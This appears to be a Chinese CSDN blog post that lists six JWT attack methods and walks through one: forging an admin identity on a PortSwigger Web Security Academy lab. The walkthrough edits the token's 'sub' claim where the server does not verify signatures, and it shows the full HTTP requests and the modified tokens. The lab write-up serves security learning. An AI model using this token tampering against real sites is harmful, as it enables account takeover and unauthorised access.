6种常见的JWT Attack,绕过网站身份验证 - 1.签名未验证

已于 2024-04-06 10:13:16 修改
阅读量403 收藏 4
点赞数 5
分类专栏: 网络空间安全 web安全 文章标签: 安全 web安全 安全威胁分析 系统安全 安全性测试 威胁分析
于 2024-04-04 22:21:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/raymond0820/article/details/137384013
版权

简介

JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。

JWT常见攻击手法有以下几种:

  1. 签名未验证
  2. JWT无签名
  3. 爆力破解对称式加密签名
  4. 用kid绕过对称式加密签名
  5. 用JWK绕过非对称式加密签名
  6. 用JKU绕过非对称式加密签名


关于JWT的介绍可参考json web token介绍

1.签名未验证

网站没有验证JWT签名,攻击者可以对JWT内容任意更改
举例如下,当存取admin页面时,返回只有administrator帐户才能使用

################ request ################ 
GET /admin HTTP/1.1
Host: 0a36001b04ccef7bc0a7741d006c0066.web-security-academy.net
Cookie:session=eyJraWQiOiI0ZjY1MzkzNC0yMTM3LTQzNGItYjE0OC0yNzg4Y2Y0OGRlMWYiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NjU3ODQxNH0.Hp6sPpaIOCVwA34Eb2-h_pU2r6dUH_ZptjPt07uvKcF6z7PGUKWTV6ZQqXMoArudgF2E0WyAP0BYzoYZ1M4WVu4tUY3v_1Tnbf7-H_EqIDihcQ6KuxNaXNNPZw22GGvVgUdCsy3XgfZFH_LY5raFPpjavJ5aAOcqXG58zQlFYWcU5Kye2xB5AczvbDEDnpvQk00ygPBPSnXbV4JIk1jRJDM1suI5LN_tKn7LD_oBOwRGaJtreNekpV-8NXqbxzfjgVqAmHhQz6ZDxV-5LmiHT9yXVX7PdsUt5xhfrZYkTd_s8n6s0RvHvR1gwueVCplJqecZRRCkaAzwF9O1M9GwPw
Cache-Control: max-age=0
...omit...

################ response ################ 
...omit... only allow administrator ...omit...

使用JWT editor可以发现,token中的eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NjU3ODQxNH0等于以下

{
    "iss": "portswigger",
    "sub": "wiener",
    "exp": 1656578414
}

透过JWT editor将上述内容改为administrator

{
    "iss": "portswigger",
    "sub": "administrator",
    "exp": 1656578414
}

此时token里这部份会变成eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1Nzg0MTR9
送出编辑token后的请求,可成功存取admin介面

################ request ################ 
GET /admin HTTP/1.1
Host: 0a36001b04ccef7bc0a7741d006c0066.web-security-academy.net
Cookie:session=eyJraWQiOiI0ZjY1MzkzNC0yMTM3LTQzNGItYjE0OC0yNzg4Y2Y0OGRlMWYiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1Nzg0MTR9.Hp6sPpaIOCVwA34Eb2-h_pU2r6dUH_ZptjPt07uvKcF6z7PGUKWTV6ZQqXMoArudgF2E0WyAP0BYzoYZ1M4WVu4tUY3v_1Tnbf7-H_EqIDihcQ6KuxNaXNNPZw22GGvVgUdCsy3XgfZFH_LY5raFPpjavJ5aAOcqXG58zQlFYWcU5Kye2xB5AczvbDEDnpvQk00ygPBPSnXbV4JIk1jRJDM1suI5LN_tKn7LD_oBOwRGaJtreNekpV-8NXqbxzfjgVqAmHhQz6ZDxV-5LmiHT9yXVX7PdsUt5xhfrZYkTd_s8n6s0RvHvR1gwueVCplJqecZRRCkaAzwF9O1M9GwPw
Cache-Control: max-age=0
...omit...

################ response ################ 
...omit...
<section>
<p>User deleted successfully!</p>
	<h1>Users</h1>
	<div>
	<span>wiener - </span>
	<a href="/admin/delete?username=wiener">Delete</a>
...omit...

其他方法可参考

6种常见的JWT attack方法

Web Security Academy



 

牛的大腦-網站安全
关注
专栏目录
SpringBoot编程基础教程:安全身份验证
程序员光剑
11-10 77
安全性在现代社会是一个非常重要的话题。从物理到数字,安全意味着保护用户、企业及其数据不受侵犯,防止信息泄露或丢失、隐私泄漏等安全风险发生。无论是个人电脑、手机、服务器还是其他网络设备,安全都是非常重要的。另外,随着互联网的普及,越来越多的人把注意力放在了在线上以及网络交易中,而这些交易往往涉及到一些私密的信息。因此,如何确保在线交易中的信息安全就显得尤为重要。
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
JSON Web Token JWT简单的绕过方法
mirocky的博客
12-21 847
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。如图所示JWT由三部分构成,分别是header,payload和signature,在这三者之间由"."连接。在payload中,iot代表JWT生成时间,exp代表JWT失效时间,延长exp时间也可进行绕过。如图为JWT加密后的示例,JWT再由后端返回至前端后,由前端封装到HTTP Header中。
jwt实现登录验证
lyc000412的博客
03-12 2194
jwt实现登录验证
JWT登录校验流程
最新发布
m0_73966521的博客
08-03 1087
但是传统的会话技术对用户的掌控能力更强,就是我可以直接在我的数据库中将session设置为失效,你直接就登录不了,不过对比于jwt,我们必须会设置一个过期时间,只有等过期时间过去了,你才不能登录。就是当你登录成功之后,系统会给你下发一个令牌,这个令牌肯定会比较复杂,拼接你的账号密码这些然后经过加密算法算出来一个字符串三个部分,三个部分就是我上面说的请求头,负载,签名。记住这个我们需要判断,这个路径是不是登录方法,如果是登录方法,我们都还没给他令牌,肯定。
登录校验解决方案JWT
记录学习,共同进步
03-26 1757
使用Jwt登录返回token,生成工具包,快速通关JWT
浅析JWT安全问题
蚁景网安学院
08-08 1106
前不久研究websocket时,发现port-swigger出了新的靶场,一看是关于jwt安全的,刚好来总结回忆一下。
JWT漏洞的基础学习
qq_70303095的博客
10-29 350
JWT漏洞利用的基础学习
信息安全_数据安全_Duplicate_Paths_Attack_-_Get_Ele.pdf
08-21
"Duplicate Paths Attack"是一针对系统安全性的攻击手段,它涉及到对身份验证过程的伪造,从而获取更高的系统权限。这个攻击策略利用了路径规范化的问题,允许攻击者在特定情况下模仿合法的身份,进而执行恶意代码...
Over-the-air_programming.pdf
11-19
15. Replay Attack:重播攻击,攻击者记录加密信息并重复发送,以绕过身份验证。 16. Secure Memory:安全内存,专用于存储敏感信息,如加密密钥,具有严格的访问控制。 17. NIST:美国国家标准与技术研究所,制定...
confused-deputy-attack:这是对 Android 的混淆代理攻击的展示
06-29
3. **安全的Intent处理**:当接收Intent时,确保检查发送方的身份,并在必要时进行签名验证。 4. **使用安全的编程库**:选择经过安全审计的第三方库,避免引入已知漏洞。 5. **更新系统和库**:及时更新Android系统...
Day69:WEB攻防-Java安全&JWT攻防&Swagger自动化&算法&签名&密匙&Druid泄漏
qq_61553520的博客
03-18 1358
小迪安全-Day69:WEB攻防-Java安全&JWT攻防&Swagger自动化&算法&签名&密匙&Druid泄漏
JSON Web 令牌 (JWT)攻击_jwt payload 用户id,2024年最新全网最具深度的三次握手、四次挥手讲解
2301_82243558的博客
04-09 569
1.1 生成密钥:首先,需要生成一个密钥(secret key),这个密钥只有发送方和接收方知道。1.2 签名:在JWT中,要对头部和有效载荷进行签名,首先将头部和有效载荷进行Base64编码,得到两个字符串,分别记为header_base64和payload_base64。
(渗透学习)JWT绕过
yang1234567898的博客
12-30 5548
1、什么是JWT 参考文章:https://www.jianshu.com/p/576dbf44b2ae 2、JWT验证绕过 https://jwt.io/
踩坑 JWT 签名验证失败,java 到 php
wolf23151269的博客
04-19 1674
JWT 签名验证失败,java 生成 php解 //java 出错误版 JwtBuilder jwtBuilder = Jwts.builder(); String token = jwtBuilder .claim("access_key","6uVG1xmibb3EX7XhUV3g6jflPidNhNon") .claim("header","MARKETING_MALL") .s...
jwt php签名验证不通过_JWT(JSON Web Token)
weixin_39806065的博客
11-27 396
微信公众号:PHP在线之前的 OAuth 系列 中我们的目标都是获取 Token ; 那这个 Token 是个什么样的呢? RFC 并没有明确规定; 不过业内比较常见的方案是使用 JWTJWT 是 JSON Web Token 的缩写; 要学习 JWT 我们可以拿 session 作为参照物; 在传统开发中我们在用户登录后会创建一个 session 文件 xxx ; 用户的 id 等...
JWT身份验证绕过——来自hacker game2020
fatmoForE
12-02 3723
JWT简介 JWT (JSON Web Tokens) ,是一串用于身份验证的token(内容公开),存储在客户端,通过签名保证token的内容没有被篡改。 题解分析 官方wp中有这一串token: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJndWVzdCIsImV4cCI6MTYwNDM3NDE4N30.ZADFKRFG0I5LpsUwb2hAqcyD1BOWf5doLrxVIuI-OINDPaBNKsuCPInxadxW5VbhDmmkcgBnGT_
关于JWT的一些攻击方法
zhangge3663的博客
04-23 1025
前几天做了一个登录页面的绕过,由于认证返回的token是JWT的格式,于是花了一些时间看了看有关于JWT的东西。 #关于JWT JWT的全称为Json Web Token。它遵循JOSN格式,与传统的cookie+session的认证方式不同,服务器使用它的好处是只需要保存秘钥信息,通过加密算法验证token即可,减小了保存用户信息的资源开销。 jwt可以分成三部分,header.payload.signature ## header部分 通常它会长成这个样子 { "alg": ".
def cooldowns(self): current_time = pygame.time.get_ticks() if not self.can_attack: if current_time - self.attack_time >= self.attack_cooldown: self.can_attack = True if not self.vulnerable: if current_time - self.hit_time >= self.invincibility_duration: self.vulnerable = True对此代码进行注解
06-03
好的,以下是对这段代码的注释: ```python def cooldowns(self): # 获取当前时间 current_time = pygame.time.get_ticks() # 如果角色不能攻击 if not self.can_attack: # 如果距离上次攻击已经过了攻击冷却时间 if current_time - self.attack_time >= self.attack_cooldown: # 将 can_attack 标记为 True,表示可以再次攻击 self.can_attack = True # 如果角色不处于无敌状态 if not self.vulnerable: # 如果距离上次受到攻击已经过了无敌时间 if current_time - self.hit_time >= self.invincibility_duration: # 将 vulnerable 标记为 True,表示可以再次受到攻击 self.vulnerable = True ``` 这段代码主要是控制角色攻击和无敌状态的冷却机制。其中 `pygame.time.get_ticks()` 函数用于获取当前时间,以毫秒为单位。代码中的 `can_attack` 和 `vulnerable` 变量分别表示是否能够攻击和是否处于无敌状态。 在代码中,首先判断角色是否能够攻击。如果不能攻击,则判断距离上次攻击是否已经过了攻击冷却时间。如果已经过了攻击冷却时间,就将 `can_attack` 设置为 True,表示可以再次攻击。 接着判断角色是否处于无敌状态。如果不是无敌状态,则判断距离上次受到攻击是否已经过了无敌时间。如果已经过了无敌时间,就将 `vulnerable` 设置为 True,表示可以再次受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值